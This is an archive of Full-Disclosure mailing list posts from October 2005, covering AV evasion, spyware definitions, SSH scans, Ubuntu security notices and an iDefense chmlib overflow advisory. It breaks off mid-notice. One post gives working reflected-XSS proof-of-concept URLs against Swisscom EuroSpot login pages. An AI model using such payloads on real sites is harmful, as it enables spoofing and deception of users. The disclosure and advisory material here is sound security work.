Bipin Gautam said: + Consequently, the issue that you describe is *not* a + vulnerability issue, but rather just an example of a new + variant that has not yet been added to an AV vendor's + database of known viruses. + + yap, maybe* but i consider this issue equv. to the + 'classic issue' of adding NOP to the shell-code to bypass + IDS/IPS You ain't gonna add every possible combinations + as signatures! That is true, but the key point is that you _don't have_ to add a sig for every possible combination. You only have to add a sig when somebody actually releases a functioning variant into the wild. Or, if your AV scanner uses heuristic / rules-based scanning by default, you can just write a rule to detect most/all of the combinations. And this is exactly the way IDS/IPS works too. They don't write sigs for every theoretically possible vulnerability or threat; they just write sigs/rules for known exploits and vulnerabilities, and for theoretical issues that have a good probability of showing up in the wild. So, the AV vendors wouldn't have to do anything unless somebody actually created a working variant of a virus based on this magic byte concept, and released it into the wild. + Variant huh? + + My defination of variant are bit straight forward. And + sure isn't a 'universal trick' that can be used to + modified any malicious executable (which has known Av + signature) by a 8 year old with 0 programming knowledge + or by using any special tools to make it un-detectable, + later. Admit it... Av vendors aren't going to + doyuble/tripple their Av defination to detect all of such + possible varient. Common, is the execution point of ANY + instruction code or program flow is being changed? See above. 8 year olds? Considering the maturity of current virus creation toolkits, I have no doubt that 8 year olds with no programming skills are pointing and clicking to create new viruses. All that said, if an AV vendor can fix this issue by easily creating patches for all of their products, then great. I'm simply stating that the issue can be effectively, and probably more easily, fixed too by creating new signatures or rules. I bet this is how most vendors will handle the issue now. Remember: the AV vendors only have to write signatures/rules if Andrey, or somebody else, actually creates a functioning variant and releases it into the wild. Andrey Bayora said: + The AV vendors aren't going to patch their products if + they don't detect your PoC; they're just going to write a + new signature or modify an existing signature to detect + your new variants. The fact that it can and will be + fixed by AV signatures instead of product patches should + help you figure out if this is a product vulnerability + issue or just a new virus variant issue. + + Good point, so I have news for you - some AV vendors + contacted me and they are WILL issue patches for their + products. Is it what you need as a proof of existence of + a bug? Please, wait couple of weeks. Cool - there's more than one way to skin a virus. As long as they take action when necessary to mitigate the actual / real risks. + BTW, Andrey, did you bother to use the deep scan, + heuristic mode, reviewer mode, etc to see if any + of those AV scanners picked up your new variants? + + YES, that is the reason why I prefer to use my AV lab + instead of virustotal.com and others. The only exception + is CA - I tested 7.0 version that didn't has reviewer + mode (or I didn't found how to enable this). None of the 15 vendors you listed as vulnerable had any sort of deep scan or heuristic mode that detected your variants? + Best regards, + Andrey Bayora. Bottom line: the issue you have discovered/reported is just one of zillions of theoretical attacks / viruses / variants. The known virus AV vendors only need to address the actual viruses/variants that make it into the wild or are sent to them. This is the way most AV, and heck even network security, products work. They only address the real or probable threats. If they tried to address all of the theoretical stuff too, their products - and even the internet - would grind to a halt (nightmares like TCP/IP, SMTP Win32, etc insure this). IMO, the best solution for this, and all other AV issues, is to just lock down a *BSD or linux box and use that instead. We can probably all agree on that. -- x @ bos ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] HHU #1: It's secure, it's reliable, it's Swiss
___ ___ ___ /__/\ /__/\ /__/\ \ \:\\ \:\\ \:\ \__\:\\__\:\\ \:\ ___ / /::\ ___ / /::\ ___ \ \:\ /__/\ /:/\:\ /__/\ /:/\:\ /__/\ \__\:\ \ \:\/:/__\/ \ \:\/:/__\/ \ \:\ / /:/ \ \::/ \ \::/ \ \:\ /:/ \ \:\\ \:\\ \:\/:/ \ \:\\ \:\\ \::/ \__\/ \__\/ \__\/ It's secure, it's reliable, it's Swiss HHU --- Homeless Hackers United is a small group of homeless hackers from Europe and North America. We can't afford paying for Internet access or hotel rooms. Our only crime is to have a laptop and wireless card, and few knowledge. Homeless state give us the freedom to access and use various open systems, accessible from public places. The following has been tested in UK, Germany, France and Norway. Who --- Swisscom EuroSpot is a wireless service offered in airports, hotels and other public places. Customers buy certain amount of time online and get access to the wireless network. The login page is of course open in order to join and subscribe to the service. HHU has been able to access, and validate around several hotels and public places. Severity Medium Vulnerability - XSS, URL evasion Details --- Swisscom access point seems to use radius servers to provide internet access to their customers. We also noticed issues on the radius authentification process that may be published later. After joining the network you will have either to buy access time or login. The following has been tested in UK, Germany, France and Norway. http://login**.swisscom-eurospot.com/error.php? error=nasunknown_uiUI=XSS http://login**.swisscom-eurospot.com/login.php? LANG=deUserID=0RadiusReply=XSS Proof of Concept http://login02.swisscom-eurospot.com/error.php? error=nasunknown_uiUI=Please%20fix%20this%20site http://login02.swisscom-eurospot.com/error.php?error=nasunknown_uiUI= %3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E http://login02.swisscom-eurospot.com/error.php?error=nasunknown_uiUI= %3CIFRAME%20SRC=javascript:window.parent.location.replace(%2527http:// google.com%2527)%3E%3C/IFRAME%3E Impacts --- Change, spoof and fool end-users on login page or paiement page. With a bit on imagination it can be worst. Timeline Discovered: august 14th 2005 Disclosure: october 28th 2005 Service Provider: no HHU Policy -- HHU can't even afford food, and we're are not paid to debug softwares or systems for free. We discover, then publish what we find. Will route tcp/ip packets for food! Fool me once, shame on — shame on you. Fool me — you can't get fooled again. — George W. Bush HHU Credits --- deepquest for discovering and POC, Mescalito for more POC. original post http://deepquest.code511.com/blog/more.php?id=319_0_1_0_M ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: Microsoft AntiSpyware falling furtherbehind
(This is important day for you, now you know you're not alone ;) In regard to spyware, at last I hear clear and logical formulation. Theory is nice, but practice differs. In its broader sense, Spyware is used as a synonym for what the Anti-Spyware Coalition calls Spyware and Other Potentially Unwanted Technologies: . Spyware (narrow) . Snoopware . Unauthorized Keylogger . Unauthorized Screen Scraper . Nuisance or Harmful Adware . Backdoors . Botnets . Droneware . Unauthorized Dialers . Hijackers . Rootkits . Hacker Tools (including port scanners) . Tricklers . Unauthorized Tracking Cookies http://www.antispywarecoalition.org/documents/definitions.htm On Fri, 28 Oct 2005 17:56:32 +0300, Valdis Shkesters said: (Hmm.. usually when I reply to Valdis I'm talking to myself... ;) As today I was preparing news for a portal on IT security, I am informed that Anti-Spyware Coalition is finalizing spyware definition. It is last moment to finalize with spyware, because at the horizon already has appeared crimeware. Take a look at http://www.antiphishing.org/. I'm quoting: Technical subterfuge schemes plant crimeware onto PCs to steal credentials directly, often using Trojan keylogger spyware. Maybe it would be better to call Trojan horses Trojan horses? No, because they're different. Trojan horses (a) get installed under pretense of being something wanted or beneficial (Hey, I'm a neat fun codec that lets you view these movies...) and (b) once there, gives the attacker a back door into the system, to do unspecified things (run commands, launch DDoS attacks, send spam, scan for other vulnerable software, upload plugins to extend the Trojan's functionality, or whatever). Spyware, on the other hand (a) *may* be installed via Trojan Horse means, but may also be forcibly inserted on a system via a software vulnerability, or added in via the above-mentioned plugin method by an already-present Trojan, and (b) is software that monitors system activity (keystrokes, screen pixmaps, etc) in an effort to acquire credentials or other sensitive information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-212-1] libgda2 vulnerability
=== Ubuntu Security Notice USN-212-1 October 28, 2005 libgda2 vulnerability CAN-2005-2958 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubuntu 5.04 (Hoary Hedgehog) Ubuntu 5.10 (Breezy Badger) The following packages are affected: libgda2-1 libgda2-3 The problem can be corrected by upgrading the affected package to version 1.0.4-1ubuntu0.1 (for Ubuntu 4.10), 1.1.99-1ubuntu0.1 (for Ubuntu 5.04), or 1.2.1-2ubuntu3.1 (for Ubuntu 5.10). In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Steve Kemp discovered two format string vulnerabilities in the logging handler of the Gnome database access library. Depending on the application that uses the library, this could have been exploited to execute arbitrary code with the permission of the user running the application. Updated packages for Ubuntu 4.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libg/libgda2/libgda2_1.0.4-1ubuntu0.1.diff.gz Size/MD5:14829 ba4ce8b304539a61ab575d932711070f http://security.ubuntu.com/ubuntu/pool/main/libg/libgda2/libgda2_1.0.4-1ubuntu0.1.dsc Size/MD5: 1961 c6eaf76b68cd4ea8f436a62f2dab101b http://security.ubuntu.com/ubuntu/pool/main/libg/libgda2/libgda2_1.0.4.orig.tar.gz Size/MD5: 1778950 345980ba52dcc1a4d24092e57869f92c Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libg/libgda2/libgda2-doc_1.0.4-1ubuntu0.1_all.deb Size/MD5: 212224 354ca028706f54fa53ad89b93fbad5ed amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/libg/libgda2/gda2-freetds_1.0.4-1ubuntu0.1_amd64.deb Size/MD5:72040 2ce51b479b815b0fe71abe3e8bfccfd9 http://security.ubuntu.com/ubuntu/pool/universe/libg/libgda2/gda2-mysql_1.0.4-1ubuntu0.1_amd64.deb Size/MD5:18266 345c90c113c27a1241fa9c88949c1a3e http://security.ubuntu.com/ubuntu/pool/universe/libg/libgda2/gda2-odbc_1.0.4-1ubuntu0.1_amd64.deb Size/MD5:13316 f6f3c62598bf67ce54b4c992ce1a2b39 http://security.ubuntu.com/ubuntu/pool/universe/libg/libgda2/gda2-postgres_1.0.4-1ubuntu0.1_amd64.deb Size/MD5:24476 0c9eb106b5f1eb434f7aa0eaf8005814 http://security.ubuntu.com/ubuntu/pool/universe/libg/libgda2/gda2-sqlite_1.0.4-1ubuntu0.1_amd64.deb Size/MD5:12396 d719341406907ed2816b3bbc71e84158 http://security.ubuntu.com/ubuntu/pool/main/libg/libgda2/libgda2-1_1.0.4-1ubuntu0.1_amd64.deb Size/MD5: 223580 aefc05d04856fc97187de0e8e5a85216 http://security.ubuntu.com/ubuntu/pool/main/libg/libgda2/libgda2-common_1.0.4-1ubuntu0.1_amd64.deb Size/MD5: 279102 e3513da5ad1d08a9e59627630587ac7f http://security.ubuntu.com/ubuntu/pool/main/libg/libgda2/libgda2-dbg_1.0.4-1ubuntu0.1_amd64.deb Size/MD5: 1734352 8048f322356530e36f10e63282bf9d7c http://security.ubuntu.com/ubuntu/pool/main/libg/libgda2/libgda2-dev_1.0.4-1ubuntu0.1_amd64.deb Size/MD5: 313830 a6cd2d0bf8971dcd5814d7cf4a47b122 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/libg/libgda2/gda2-freetds_1.0.4-1ubuntu0.1_i386.deb Size/MD5:70584 ce56c16f4697028f3bf11250664ba125 http://security.ubuntu.com/ubuntu/pool/universe/libg/libgda2/gda2-mysql_1.0.4-1ubuntu0.1_i386.deb Size/MD5:16470 f59e3521b70e11b2361451a29c8665ff http://security.ubuntu.com/ubuntu/pool/universe/libg/libgda2/gda2-odbc_1.0.4-1ubuntu0.1_i386.deb Size/MD5:12100 356c229d2e2f559333dc09db7656f20d http://security.ubuntu.com/ubuntu/pool/universe/libg/libgda2/gda2-postgres_1.0.4-1ubuntu0.1_i386.deb Size/MD5:22490 54f9c4ed879f81658df08404bdb30a57 http://security.ubuntu.com/ubuntu/pool/universe/libg/libgda2/gda2-sqlite_1.0.4-1ubuntu0.1_i386.deb Size/MD5:11030 eab5962d136c45315a0b3f704a7134f9 http://security.ubuntu.com/ubuntu/pool/main/libg/libgda2/libgda2-1_1.0.4-1ubuntu0.1_i386.deb Size/MD5: 196738 130447269c9b143214c913b6a37b9c69 http://security.ubuntu.com/ubuntu/pool/main/libg/libgda2/libgda2-common_1.0.4-1ubuntu0.1_i386.deb Size/MD5: 274650 c593c6c45152608abca1f2a1c7509378 http://security.ubuntu.com/ubuntu/pool/main/libg/libgda2/libgda2-dbg_1.0.4-1ubuntu0.1_i386.deb Size/MD5: 1698036 aaea8cad4c2d58fd3e4079c7a0c93999 http://security.ubuntu.com/ubuntu/pool/main/libg/libgda2/libgda2-dev_1.0.4-1ubuntu0.1_i386.deb Size/MD5: 246530 f719503a52dcbb72c26937d83f42c3d2 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/libg/libgda2/gda2-freetds_1.0.4-1ubuntu0.1_powerpc.deb Size/MD5:71976 3364891a091d4f334222c840bd2384fd
[Full-disclosure] [USN-213-1] sudo vulnerability
=== Ubuntu Security Notice USN-213-1 October 28, 2005 sudo vulnerability CVE-2005-2959 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubuntu 5.04 (Hoary Hedgehog) Ubuntu 5.10 (Breezy Badger) The following packages are affected: sudo The problem can be corrected by upgrading the affected package to version 1.6.7p5-1ubuntu4.3 (for Ubuntu 4.10), 1.6.8p5-1ubuntu2.2 (for Ubuntu 5.04), or 1.6.8p9-2ubuntu2.1 (for Ubuntu 5.10). In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Tavis Ormandy discovered a privilege escalation vulnerability in sudo. On executing shell scripts with sudo, the P4 and SHELLOPTS environment variables were not cleaned properly. If sudo is set up to grant limited sudo privileges to normal users this could be exploited to run arbitrary commands as the target user. Updated packags for Ubuntu 4.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5-1ubuntu4.3.diff.gz Size/MD5:21082 c81698c37a6dabb9eccf9d9c4a0b48e9 http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5-1ubuntu4.3.dsc Size/MD5: 585 dfd36c233ae8bfb0b16d6995683c4bb6 http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5.orig.tar.gz Size/MD5: 349785 55d503e5c35bf1ea83d38244e0242aaf amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5-1ubuntu4.3_amd64.deb Size/MD5: 156228 ea32212dcf00d19b65df967cf16d7138 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5-1ubuntu4.3_i386.deb Size/MD5: 145676 f04e61af4af0740dbd21f8365be2005e powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5-1ubuntu4.3_powerpc.deb Size/MD5: 153246 70cf540392b2fa601564cfb1a2b3b1e7 Updated packags for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p5-1ubuntu2.2.diff.gz Size/MD5:24513 1a6fa0bf72bdc96cd873c10d2607c470 http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p5-1ubuntu2.2.dsc Size/MD5: 585 6b50f803e5627991dc92846244e7ae08 http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p5.orig.tar.gz Size/MD5: 584832 03538d938b8593d6f1d66ec6c067b5b5 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p5-1ubuntu2.2_amd64.deb Size/MD5: 170356 3c158ee2844029be088446f6a58b0aae i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p5-1ubuntu2.2_i386.deb Size/MD5: 158662 5c72a5a138b401fe03d164ae6a454bd3 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p5-1ubuntu2.2_powerpc.deb Size/MD5: 165390 831a1b3806ec0e2ebd4429cf0334dd4e Updated packags for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p9-2ubuntu2.1.diff.gz Size/MD5:21867 259154beb440d8162588bbf30d697d98 http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p9-2ubuntu2.1.dsc Size/MD5: 585 8439503439e0bc52951aa0b71c93904f http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p9.orig.tar.gz Size/MD5: 585509 6d0346abd16914956bc7ea4f17fc85fb amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p9-2ubuntu2.1_amd64.deb Size/MD5: 172296 0e01662adeada9a1a20431f576059f05 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p9-2ubuntu2.1_i386.deb Size/MD5: 158766 f3858eb968eaa1ae295d39cfe3e4e7d0 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p9-2ubuntu2.1_powerpc.deb Size/MD5: 166862 84538e98f7e7bb93a37fa228e55a7fb5 signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDefense Security Advisory 10.28.05: Multiple Vendor chmlib CHM File Handling Buffer Overflow Vulnerability
Multiple Vendor chmlib CHM File Handling Buffer Overflow Vulnerability iDefense Security Advisory 10.28.05 www.idefense.com/application/poi/display?id=332type=vulnerabilities October 28, 2005 I. BACKGROUND chmlib is a library for dealing with Microsoft ITSS/CHM format files. II. DESCRIPTION Remote exploitation of a stack overflow vulnerability in chmlib as included in various Linux distributions allows attackers to execute arbitrary code. The vulnerability specifically exists due to an unchecked memory copy while processing a CHM file. The vulnerability exists in the following code, which is found in chm_lib.c: static UChar *_chm_find_in_PMGL(UChar *page_buf, UInt32 block_len, const char *objPath) { [...] char buffer[CHM_MAX_PATHLEN+1]; /* figure out where to start and end */ cur = page_buf; hremain = _CHM_PMGL_LEN; if (! _unmarshal_pmgl_header(cur, hremain, header)) return NULL; end = page_buf + block_len - (header.free_space); /* now, scan progressively */ while (cur end) { /* grab the name */ temp = cur; strLen = _chm_parse_cword(cur); if (! _chm_parse_UTF8(cur, strLen, buffer)) return NULL; [..] _chm_parse_cword can be forced to return a value larger than CHM_MAX_PATHLEN. This value is then used while copying user controlled data into a CHM_MAX_PATHLEN sized stack buffer. This allows the attacker full control over execution flow by overwriting the saved return address on the stack. III. ANALYSIS Exploitation could allow attackers to execute arbitrary code with the privileges of the user processing the CHM file. Remote exploitation can be achieved by sending a malicious file in an e-mail message to the target user. IV. DETECTION iDefense has confirmed the existence of this vulnerability in chmlib 0.35. It is suspected that all versions of chmlib are vulnerable. The following vendors distribute susceptible chmlib packages within their respective operating system distributions: FreeBSD Project: FreeBSD 5.4 and prior Gentoo Foundation Inc.: Gentoo Linux 1.1a, 1.2, 1.4, 2004.0, 2004.1 and 2004.2 V. WORKAROUND Do not open CHM files sent from an untrusted source. VI. VENDOR RESPONSE chmlib-0.36 addresses this vulnerability and is available for download at: http://freshmeat.net/projects/chmlib/ VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-2930 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 09/08/2005 Initial vendor notification 09/09/2005 Initial vendor response 10/28/2005 Public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://www.iDefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.iDefense.com X. LEGAL NOTICES Copyright (c) 2005 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Brain dead SSH scans from Italy
Etaoin Shrdlu wrote: Well, I'm stumped. I mean, really stumped. I've had a host scanning my network for the past three days... I'm at a loss. If anyone knows Italian (I don't), and can contact one of: [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] or anyone at ocem.com, please, let them know that the machine is compromised, and that they need to take it off line, and clean it up. Thanks to whomever finally got through, however you did it. I had actually allowed one host to start responding, and it had gotten to the part I always least understand, i.e. the tries for root's password. I mean, really, are there that many hosts out there with root accounts that can be guessed with an automated password guesser? Anyway, it suddenly stopped, and stopped attempting the other machine(s) as well. Whew. Thanks again. -- There are two ways, my friend, that you can be rich in life. One is to make a lot of money and the other is to have few needs. William Sloane Coffin, Letters to a Young Doubter ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Brain dead SSH scans from Italy
On Fri, 28 Oct 2005 13:14:31 PDT, Etaoin Shrdlu said: always least understand, i.e. the tries for root's password. I mean, really, are there that many hosts out there with root accounts that can be guessed with an automated password guesser? You're new here, aren't you? :) pgpzksyA7Oqna.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Brain dead SSH scans from Italy
Etaoin Shrdlu wrote: Well, I'm stumped. I mean, really stumped. I've had a host scanning my network for the past three days, and it initially looked like one of the automated scans we've all become so familiar with (unfortunately). Naturally, the automatic defense was engaged, and I thought that would be the end of it. Nope. It continues to send SYN packets, and although it's dropped off in attacks to the other machines, it still pounds at the doors of two of them. Those two machines have a couple of things in common: they are both running BIND 9, and are both OpenBSD {mumble}. I've sent email off to the RIPE contacts for the IP (195.250.227.226), and to the WHOIS contacts for the domain (ocem.com), and to [EMAIL PROTECTED] as well. Nothing. If I take off the null routing on either of those machines, it immediately starts hammering at them, with no signs of cessation. I have considered just letting it finish, but I'm more concerned that there's a new variant on this moronic scan that doesn't know when to quit. I suspect that the continuation is because they are DNS servers, since I took the blocking off of one of the other machines also running OpenBSD, and the scanning did not resume (although I had expected it to). I'm at a loss. If anyone knows Italian (I don't), and can contact one of: [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] or anyone at ocem.com, please, let them know that the machine is compromised, and that they need to take it off line, and clean it up. TIA and all that. -- There are two ways, my friend, that you can be rich in life. One is to make a lot of money and the other is to have few needs. William Sloane Coffin, Letters to a Young Doubter ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ I'm italian, if you want, send to me the text of the email for: [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] and I will take care myself of the translation. Regards Vania ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-151-3] zlib vulnerabilities
=== Ubuntu Security Notice USN-151-3 October 28, 2005 aide vulnerabilities CVE-2005-1849, CVE-2005-2096 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubuntu 5.04 (Hoary Hedgehog) Ubuntu 5.10 (Breezy Badger) The following packages are affected: aide The problem can be corrected by upgrading the affected package to version 0.10-3ubuntu0.1 (for Ubuntu 4.10), 0.10-4ubuntu0.1 (for Ubuntu 5.04), or 0.10-6.1ubuntu0.1 (for Ubuntu 5.10). In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: USN-148-1 and USN-151-1 fixed two security flaws in zlib, which could be exploited to cause Denial of Service attacks or even arbitrary code execution with malicious data streams. Since aide is statically linked against the zlib library, it is also affected by these issues. The updated packagages have been rebuilt against the fixed zlib. Updated packages for Ubuntu 4.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-3ubuntu0.1.diff.gz Size/MD5:28081 d569b7974a6204481346128876a0a530 http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-3ubuntu0.1.dsc Size/MD5: 703 cc5158a58a35e46dfc0bee0b0a34380b http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10.orig.tar.gz Size/MD5: 234184 39eb7d21064cac7b409c45d038b86cd8 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-3ubuntu0.1_amd64.deb Size/MD5: 413050 086e1a2279c3cd8ac1b6a2414d48ce18 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-3ubuntu0.1_i386.deb Size/MD5: 398942 07096e82a51ee10ce965571e08342952 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-3ubuntu0.1_powerpc.deb Size/MD5: 430230 77d787a8f00bf5058b21010a2c52acfa Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-4ubuntu0.1.diff.gz Size/MD5:29359 366869464761485ef3d29915ae294ab1 http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-4ubuntu0.1.dsc Size/MD5: 703 28126aa389a49cc5354e6c704237b334 http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10.orig.tar.gz Size/MD5: 234184 39eb7d21064cac7b409c45d038b86cd8 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-4ubuntu0.1_amd64.deb Size/MD5: 465630 63bc8c81c424d4bfb00c233a2e97695d i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-4ubuntu0.1_i386.deb Size/MD5: 431590 109018a99a6588f7f48ee8be595bf2b6 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-4ubuntu0.1_powerpc.deb Size/MD5: 471800 73571a01182d41ec0f5ce73cd5b8cdbc Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-6.1ubuntu0.1.diff.gz Size/MD5:36588 1428d11ede7d4d4996b9f6d719aa9557 http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-6.1ubuntu0.1.dsc Size/MD5: 763 715edd426517405c0f81feff1e7511c7 http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10.orig.tar.gz Size/MD5: 234184 39eb7d21064cac7b409c45d038b86cd8 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-6.1ubuntu0.1_amd64.deb Size/MD5: 513230 9a1477b093630a538262a137d7c37730 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-6.1ubuntu0.1_i386.deb Size/MD5: 451422 41c84d68e6e4e69fe919109e00576051 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/a/aide/aide_0.10-6.1ubuntu0.1_powerpc.deb Size/MD5: 581134 df0712d4d04b4854243c01f7696eb0c5 signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-206-2] Fixed lynx packages for USN-206-1
=== Ubuntu Security Notice USN-206-2 October 29, 2005 lynx regression fix === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubuntu 5.04 (Hoary Hedgehog) Ubuntu 5.10 (Breezy Badger) The following packages are affected: lynx The problem can be corrected by upgrading the affected package to version 2.8.5-1ubuntu1.2 (for Ubuntu 4.10), 2.8.5-2ubuntu0.5.04.1 (for Ubuntu 5.04), or 2.8.5-2ubuntu0.5.10.1 (for Ubuntu 5.10). In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: USN-206-1 fixed a security vulnerability in lynx. Unfortunately the fix contained an error that caused lynx to crash under certain circumstances. The updated packages fix this. Updated packages for Ubuntu 4.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.2.diff.gz Size/MD5:17724 80e29ed0df5f9ab6cba51192efcd0f40 http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.2.dsc Size/MD5: 620 304b56403fc4cf556ceb014d26b38df4 http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz Size/MD5: 2984352 5f516a10596bd52c677f9bfd9579bc28 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.2_amd64.deb Size/MD5: 1882868 299d91958367e3ba3d045dbc4728cdf7 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.2_i386.deb Size/MD5: 1833374 9097cf80bd63bd2b5894743330d68553 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.2_powerpc.deb Size/MD5: 1878522 403692e24c015f8f87e40c3a7a57985a Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.1.diff.gz Size/MD5:18059 be5f0fa4921f982405125e60f4f551af http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.1.dsc Size/MD5: 